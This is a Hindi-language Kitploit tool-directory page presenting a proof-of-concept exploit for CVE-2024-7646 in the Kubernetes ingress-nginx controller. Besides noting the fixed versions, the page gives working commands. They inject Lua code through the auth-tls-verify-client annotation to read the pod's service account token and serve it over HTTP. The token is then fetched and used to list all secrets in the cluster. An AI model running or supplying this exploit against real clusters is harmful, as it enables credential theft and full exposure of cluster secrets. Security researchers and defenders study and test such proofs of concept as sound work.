Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-7646 — CVE-2024-7646 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/dovics/cve-2024-7646
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब सुरक्षाक्लाउड सुरक्षागलत कॉन्फ़िगरेशन
GitHubdovics/cve-2024-7646

cve-2024-7646

CVE-2024-7646 के लिए PoC

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-7646

विवरण

डिफ़ॉल्ट रूप में, nginx.ingress.kubernetes.io/server-snippet अक्षम है, लेकिन इस CVE के कारण, nginx.ingress.kubernetes.io/auth-tls-verify-client फिर भी कस्टम स्निपेट्स या यहाँ तक कि lua कोड भी सम्मिलित कर सकता है।

स्थिर संस्करण

ingress-nginx controller v1.11.2 - kubernetes/ingress-nginx#11719 और kubernetes/ingress-nginx#11721 द्वारा स्थिर किया गया ingress-nginx controller v1.10.4 - kubernetes/ingress-nginx#11718 और kubernetes/ingress-nginx#11722 द्वारा स्थिर किया गया

PoC

इनग्रेस बनाने की अनुमति आवश्यक है

root@kitploit:~
openssl genrsa -out ca.key 2048
openssl req -new -x509 -key ca.key -out ca.crt -days 365 -subj "/CN=ca"
kubectl create secret generic ca-secret --from-file=ca.crt=ca.crt
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: cve-ingress
  namespace: default
  annotations:
    nginx.ingress.kubernetes.io/auth-tls-secret: default/ca-secret
    nginx.ingress.kubernetes.io/auth-tls-verify-client: "off;\r\nlocation /token{\r\ncontent_by_lua_block{\r\nfile = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token','r')\r\nngx.say(file:read('*a'))\r\nngx.exit(ngx.HTTP_OK)\r\n}\r\n}\r\nset \$test true"
spec:
  rules:
    - host: test.ingress.io
      http:
        paths:
          - pathType: Prefix
            path: /test
            backend:
              service:
                name: test-service
                port:
                  number: 8080
EOF

डिफ़ॉल्ट कॉन्फ़िगरेशन में, वह क्रेडेंशियल क्लस्टर में सभी सीक्रेट्स तक पहुँच रखता है।

root@kitploit:~
TOKEN=$(curl 127.0.0.1:8080/token  -H "Host: test.ingress.io")
kubectl --token=$TOKEN get secret -A -o yaml
टूल डाउनलोड करें